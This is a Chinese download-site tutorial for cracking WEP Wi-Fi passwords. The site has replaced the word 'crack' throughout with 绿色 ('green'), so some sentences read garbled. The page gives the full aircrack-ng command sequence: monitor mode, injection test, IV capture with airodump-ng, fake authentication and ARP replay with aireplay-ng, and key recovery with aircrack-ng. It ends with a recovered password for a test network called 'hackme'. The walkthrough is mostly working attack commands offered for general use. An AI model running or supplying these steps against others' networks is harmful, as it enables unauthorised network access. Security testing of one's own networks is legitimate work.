您所在的位置: 首页 > 教程首页 > 网络工具 > wifi密码绿色教程

wifi密码绿色教程

来源:互联网 | 编辑:互联网 | 时间:2016-02-23 14:49:11 | 阅读:16777215

接下来,输入’iwconfig‘来查看所有无线网接口。

接下来,用airmon-ng来尝试打开monitor模式。

airmon-ng start wlan0 6

这条命令中,wlan0参数是我们的无线网卡接口,6是我们要监听的信道。这里我们必须把监听的信道设成我们所要绿色 Access Point的信道,否则无法绿色成功。(关于如何查看AP的信道,可以用后文中的aireplay-ng的-9参数)。如果成功开启monitor模式, 屏幕将显示如下信息。(注意,monitor的接口是?mon0而不是wlan0)。

如果airmon-ng报告可能有其他进程会引起冲突,你可以用'kill PID'来干掉那些进程。

下一步是Injection测试,当然假如已经做过,也能跳过。

aireplay-ng -9 mon0

参数-9表示injection test mode,而mon0是monitor接口名。输入'aireplay-ng'能够看到详细的使用说明。

当然也可以指定一个AP。

aireplay-ng -9 -e hackme mon0

接下来我们使用airodump-ng来捕获IV.

airodump-ng -c 6 --bssid C0:C1:C0:01:81:2D -w output mon0

-c 6 表示信道。 --bssid C0:C1:C0:01:81:2D是AP的MAC地址?-w capture 捕获的包的文件名前缀。

当开始捕获,屏幕会显示如下信息。

接下来我们又要用到aireplay-ng。这一次,我们用它来做一个假验证把自己的网卡接口接入到AP。开启另外一个控制台(让airodump-ng继续抓包),输入:

aireplay-ng -1 0 -e hackme -a C0:C1:C0:01:81:2D -h 00:0E:3B:1E:2F:71 mon0

-1表示伪造验证。参数是重新验证的时间(0秒)。-e hackme是无线网的名称。看到这个画面,就说明接入成功了。

接下来,我们用aireplay-ng来进行Replay攻击。

aireplay-ng -3 -b C0:C1:C0:01:81:2D -h 00:0E:3B:1E:2F:71 mon0

当开始运行,aireplay-ng会捕获ARP请求,并不停的会放。如果你像我一样只是做实验(不是在真正的网络环境中),可能会出现以下的画面。

注意到了么,捕获到 0 ARP requests和 0 ACKs。这是因为这个无线网没有任何的Traffic。现在我用另外一台电脑接入无线网,并且ping随便什么IP。这会让aireplay-ng捕获到ARP请求,从而开始Replay attack!

当我们切换到airodump-ng的屏幕,我们也能发现,数据在暴涨!”#/s”的意思就是每秒捕获多少个包(IVs)。不过这个速度取决与很多因素,如果是运行在虚拟机里面,速度可能会很慢。正常情况下,速度一般在200-400左右。

20分钟之后,我们已经捕获到327531个数据包。这么多IV已经足够我们绿色WEP密码了。

接下来,我们开始绿色WEP密码。

aircrack-ng -b C0:C1:C0:01:81:2D output*.cap

很快,密码就宣告绿色了。hackme的密码是ABCDE54321

 

类型:  大小:MB  平台:

相关文章

你可能感兴趣的内容

热门游戏

下载声明 | 法律声明 | 版权声明 | 友情链接 | 发布软件 | 最新更新

本站为非盈利性网站,不接受任何广告。本站所有资源均由网友上传,如有侵权,请发邮件至 hnrshwl@163.com

晋ICP备2024046785号-1